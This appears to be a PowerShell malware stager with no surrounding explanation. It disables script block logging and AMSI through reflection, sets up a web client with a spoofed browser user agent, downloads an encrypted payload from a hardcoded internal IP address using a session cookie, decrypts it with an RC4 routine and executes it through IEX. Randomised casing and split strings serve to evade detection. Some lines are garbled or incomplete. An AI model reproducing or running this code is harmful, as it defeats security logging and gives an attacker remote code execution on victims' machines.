If($PSVeRsiOnTabLe.PSVErSiON.MAJOR - ge 3) {
$GPF = [ReF].AssEmBly.GeTTyPE('System.Management.Automation.Utils').
"GETFiE`ld" ('cachedGroupPolicySettings', 'N' + 'onPublic,Static');
$GPC = $GPF.GetVaLue($NulL);
IF($GPC['ScriptB' + 'lockLogging']) {
$GPC['ScriptB' + 'lockLogging']['EnableScriptB' + 'lockLogging'] = 0;
$GPC['ScriptB' + 'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
$vAL = [ColLEctIOns.GeNeRiC.DIctioNaRy[sTRInG, SystEm.ObjEct]]::nEw();
$val.ADd('EnableScriptB' + 'lockLogging', 0);
$VaL.ADd('EnableScriptBlockInvocationLogging', 0);
$GPC['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB' + 'lockLogging'] = $Val
"GeTFiE`lD" ('signatures', 'N' + 'onPublic,Static').SeTVaLUe($nULL, (New - OBjECt CoLlECTIonS.GENerIC.HasHSeT[strINg]))
}[REF].ASSEMblY.GETTYpe('System.Management.Automation.AmsiUtils') | ? {
$_.GETField('amsiInitFailed', 'NonPublic,Static').SETVALUe($nULl, $trUe)
[SyStEm.Net.SERVicePOiNtMANAGEr]::EXpeCt100CoNtINUe = 0;
$wc = NEW - OBJeCT SySTeM.Net.WebCLIENT;
$u = 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';
$wc.HeAderS.Add('User-Agent', $u);
$wc.PROXy = [SYStEm.NEt.WEbREQUeST]::DEfAuLTWEbPRoxy;
$WC.PRoXY.CrEDenTiaLS = [SYsteM.NET.CrEdENTIAlCaCHE]::DEfaultNeTwORkCRedEnTiaLs;
$Script: Proxy = $wc.Proxy;
$K = [SystEM.TExT.EnCODINg]::ASCII.GeTBytes('R.%?VtC8xqgnsFc5Z+:9wdE}ABMp{mzO');
$K = $ARGS;$S = 0. .255;0. .255 | % {
$J = ($J + $S[$_] + $K[$_ % $K.COUNt]) % 256;$S[$_],
$I = ($I + 1) % 256;$H = ($H + $S[$I]) % 256;$S[$I],
$S[$I];$_ - bxor$S[($S[$I] + $S[$H]) % 256]
$ser = 'http://192.168.2.71:80';
$t = '/login/process.php';
$Wc.HEAderS.AdD("Cookie", "session=9ulatLKLx5DWZ5IawRusFS2Z2rA=");
$dAta = $WC.DoWNloAdDatA($SER + $t);
$DaTA = $DatA[4..$DatA.LeNgTH]; - jOiN[ChaR[]]( & $R $datA($IV + $K)) | IEX